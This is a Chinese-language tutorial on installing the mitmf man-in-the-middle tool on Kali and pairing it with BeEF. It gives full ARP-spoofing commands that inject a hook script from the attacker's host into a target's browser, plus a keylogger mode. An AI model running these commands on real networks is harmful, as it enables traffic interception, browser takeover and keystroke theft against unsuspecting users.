1. 程式人生 > >mitmf 中間人攻擊簡單演示

mitmf 中間人攻擊簡單演示

mitmf 是一款用來進行中間人攻擊的工具,它可以結合 BeEF 一起來使用,並利用 BeEF強大的 hook 指令碼來控制目標客戶端。

下面讓我們一起看看如何在 Kali2.0上安裝與使用 mitmf 。mitmf預設在Kali2.0上並未安裝,在之前的版本有安裝。

Kali2.0下直接安裝也行,閱讀到這裡可以直接跳到圖(apt-get install mitmf)

 

本地環境:Windows xp、IE6、kali2.0

 

首先,我們先進行工具依賴包的安裝。開啟 terminal 終端,輸入如下命令:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

以上結果出現一些安裝包無法安裝的情況,這裡我們無需理會,繼續我們的下一步操作即可。

依賴包安裝完成後,就可以開始安裝mitmf 了、輸入命令:

apt-get install mitmf

不過這樣安裝完成後 mitmf 依然無法正常使用它的一些功能,因為缺少了 twisted 的版本相容性。我們來安裝適合 mitmf 的 twisted 。如果你已經安裝過,那麼先解除安裝之前的版本。輸入命令如下:

pip uninstall twisted

並用 wget 命令進行下載。

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2

安裝 twisted 。

pip install ./Twisted-15.5.0.tar.bz2

這樣,我們就可以正常使用 mitmf 了。

下面讓我們執行 BeEF來呼叫 BeEF強大的 hook 指令碼。首先我們進入BeEF目錄並啟動它。

cd /usr/share/beef-xss

./beef

BeEF的使用可以參考其他資料,這裡就不多寫了。

好了,接下來 正式安裝,輸入以下命令:

我們在瀏覽器開啟UI介面後,下面我們就用 mitmf 進行中間人攻擊。輸入如下命令:

mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.100 --inject --js-url http://192.168.15.131:3000/hook.js

這條命令的原理是,利用ARP進行地址欺騙,讓區域網中的其他電腦,誤認為Kali為閘道器路由。當目標機器開啟瀏覽器,就會被注入 hook 指令碼,之後便可在BeEF上進行客戶端的控制。

mitmf不僅能和BeEF來結合使用,自身還有許多強大的功能。例如軟體自帶的鍵盤記錄功能,輸入命令:

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100–jskeylogger

最後,在介紹個mitmf 一個有趣的惡搞功能。它可以使目標瀏覽網頁時,所有的圖片都倒轉 180度。是不是很有意思!

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –upsidedownternet

 

更多關於此工具的使用,可以參考相關手冊與文章,這裡只是做個入門的介紹。

 

參考資料:

http://www.secist.com/archives/1056.html

https://github.com/byt3bl33d3r/MITMf

http://www.freebuf.com/sectool/45796.html